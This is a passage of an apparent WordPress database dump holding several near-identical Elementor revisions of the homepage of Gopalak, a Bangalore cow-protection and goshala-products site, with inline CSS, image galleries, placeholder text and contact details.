*/\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:20:04','2022-10-11 09:50:04','',1373,'https://gopalak.in/?p=1632',0,'revision','',0),(1633,1,'2022-10-11 15:20:04','2022-10-11 09:50:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211-48x51.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211-48x51.png 48w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-285x300.png 285w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-768x808.png 768w, https://gopalak.in/wp-content/uploads/2022/10/logo1211-50x53.png 50w, https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 960w\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:20:04','2022-10-11 09:50:04','',1373,'https://gopalak.in/?p=1633',0,'revision','',0),(1634,1,'2022-10-11 15:20:04','2022-10-11 09:50:04','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<h4>Address</h4>		\n			 800\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: pavitra@gopalak.in','Elementor #1373','','inherit','closed','closed','','1373-revision-v1','','','2022-10-11 15:20:04','2022-10-11 09:50:04','',1373,'https://gopalak.in/?p=1634',0,'revision','',0),(1635,1,'2022-10-11 15:22:22','2022-10-11 09:52:22','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"48\" height=\"51\" src=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/logo1211.png 1x,  2x\" sizes=\"(max-width: 48px) 100vw, 48px\" />															\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						shop\n					</a>\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/home/\" role=\"button\">\n						Contact us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Gopalak</h2>		\n			<h2>Values</h2>		\n		<p>In order to prevent the sinful act of killing cows or sending the cows to slaughter houses, as a small step towards protection of cows and to provide shelter for aged and unproductive cows.</p>		\n			<a href=\"https://gopalak.in/about-us/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"https://gopalak.in/elementor-1626\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1.jpg\" title=\"istockphoto-1221688781-612&#215;612\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><h3>This is the heading</h3><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.</p>		\n			<a href=\"#\" role=\"button\">\n						Click here\n					</a>\n			<h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<h1>Gopalak Values</h1>		\n		<p>Service to all, Total integrity, Absolute 